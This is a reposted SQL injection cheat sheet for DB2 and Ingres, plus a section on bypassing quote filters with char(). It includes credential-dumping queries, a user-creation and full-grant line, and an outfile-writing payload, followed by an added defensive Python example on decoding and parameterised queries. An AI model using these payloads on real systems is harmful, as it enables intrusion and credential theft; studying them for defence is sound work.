
SQL Injection Cheat Sheet

Web/Attack 2008. 11. 18. 10:35
Roles and passwords: N/A (I think DB2 uses OS-level user accounts for authentication.)
List Database Procedures: ???
Create Users + Granting Privs: ???
Time Delays: ???
Execute OS Commands: ???
Write to File System: ???
Concatenation:
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
Casting:
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas: SELECT schemaname FROM syscat.schemata;


» Ingres

Payload Description (if any)
Comments

Normal "--" and C-style /**/ comments are allowed:
select 123; -- sdfjsdlkfj
select 123; /* sdfsdf */

Batching Queries Allowed?

Not via DBI in Perl. Subsequent statements seem to get ignored:
select blah from table where foo = 1; select … doesn't matter, this is ignored.

Database Version: select dbmsinfo('_version');
Current Database User: select dbmsinfo('session_user');
System User for Current Connection: select dbmsinfo('system_user');
Current Database: select dbmsinfo('database');
Limiting Rows Returned

select top 10 blah from table;
select first 10 blah from table;

 Returning N Rows starting at Offset M

Astoundingly, this doesn't seem to be possible!

List Tables

select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';

List Columns: select column_name, column_datatype, table_name, table_owner from iicolumns;
List Database Users and Passwords

First connect to iidbdb, then:
select name, password from iiuser; 

FROM clause mandated in SELECTs?

No. You don't need to select from "dual" or anything. The following is legal:
select 1;

UNION supported?

Yes. Nothing tricky here. The following is legal:
select 1 union select 2;

Enumerate Table Privs: select table_name, permit_user, permit_type from iiaccess;
Enumerate Current Privs

select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');

Length of a string: select length('abc'); -- returns 3
Bitwise AND

The function "bit_and" exists, but seems hard to use. Here's an example of ANDing 3 and 5 together. The result is a "byte" type with value \001:

select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

Substring: select substr('abc', 2, 1); -- returns 'b'
ASCII value of a character: ???
(The "ascii" function exists, but doesn't seem to do what I'd expect.)
Roles and passwords

First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;

List Database Procedures

First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;

Create Users + Granting Privs

First you need to connect to iidbdb, then:
create user pm with password = 'password';
grant all on current installation to pm;

Time Delays: ???
Execute OS Commands: ???
Write to File System: ???
Concatenation: select 'abc' || 'def';
Casting:
select cast(123 as varchar);
select cast('123' as integer);


» Bypass SQL Injection Filters

Payload Description (if any)
select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char(39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char(39))
Writing info into files without single quotes (example). You must specify a new file (it must not already exist) and give the correct pathname.

select * from login where user = char(39,97,39)
Using char() to bypass restrictions (char(39,97,39) builds the string 'a', quotes included, without a single quote character appearing in the payload).
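The two rows above show why a filter that only blocks the quote character is not a defence: the database rebuilds the quote from char(). The following is an added example, not part of the cheat sheet or its author's material, written from the defending side. It assumes a MySQL-style char(n,n,...) function (SQLite, used here so the block runs offline, has a compatible one) and uses an in-memory table with constructed rows. It shows (1) a decoder that normalises char() calls so a detection rule sees the quote the database would see, and (2) the vulnerable string-splicing query beside the parameterised query that makes the filter question moot.

```python
import re
import sqlite3

# Matches char(39), char(39,97,39) and char( 39) as they appear in the rows above.
CHAR_CALL = re.compile(r"\bchar\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)", re.IGNORECASE)


def decode_char_calls(payload: str) -> str:
    """Replace every char(n[,n...]) call with the characters it builds.

    char(39,97,39) contains no quote character, yet the database turns it into
    the three-character string 'a' (quote, a, quote). Decoding first lets a
    detection rule compare against what the database would actually execute.
    """
    def build(match: re.Match) -> str:
        return "".join(chr(int(code)) for code in match.group(1).split(","))

    return CHAR_CALL.sub(build, payload)


def naive_quote_filter(payload: str) -> bool:
    """The filter the char() trick bypasses: allow anything without a literal quote."""
    return "'" not in payload


def normalised_quote_filter(payload: str) -> bool:
    """The same rule applied after char() decoding; the trick no longer slips through."""
    return "'" not in decode_char_calls(payload)


def _demo_db() -> sqlite3.Connection:
    """In-memory table with constructed rows, including a user literally named 'a'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO login VALUES (?, ?)",
        [("admin", "constructed-secret"), ("'a'", "constructed-other")],
    )
    return conn


def lookup_user_concatenated(username: str) -> list:
    """The vulnerable shape from the cheat sheet row: input spliced into the SQL text.

    SQLite also has char(), so the row named 'a' is selected even though no quote
    character was ever sent. Kept only for contrast with the parameterised version.
    """
    conn = _demo_db()
    rows = conn.execute(f"SELECT user FROM login WHERE user = {username}").fetchall()
    conn.close()
    return [row[0] for row in rows]


def lookup_user_parameterised(username: str) -> list:
    """The fix: bind the input as data. char(39,97,39) is then just a string that
    matches no user, regardless of what any input filter lets through."""
    conn = _demo_db()
    rows = conn.execute("SELECT user FROM login WHERE user = ?", (username,)).fetchall()
    conn.close()
    return [row[0] for row in rows]


if __name__ == "__main__":
    payload = "char(39,97,39)"
    print("naive filter passes payload:     ", naive_quote_filter(payload))
    print("decoded payload:                 ", decode_char_calls(payload))
    print("normalised filter passes payload:", normalised_quote_filter(payload))
    print("concatenated query returns:      ", lookup_user_concatenated(payload))
    print("parameterised query returns:     ", lookup_user_parameterised(payload))
```

The decoder is useful for log review and WAF rule testing, where the question is "what string does the database end up with?"; the parameterised lookup is the actual control, because bound parameters are never parsed as SQL and so neither char() nor any other encoding of a quote changes the query's structure.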
Source: http://michaeldaw.org/sql-injection-cheat-sheet/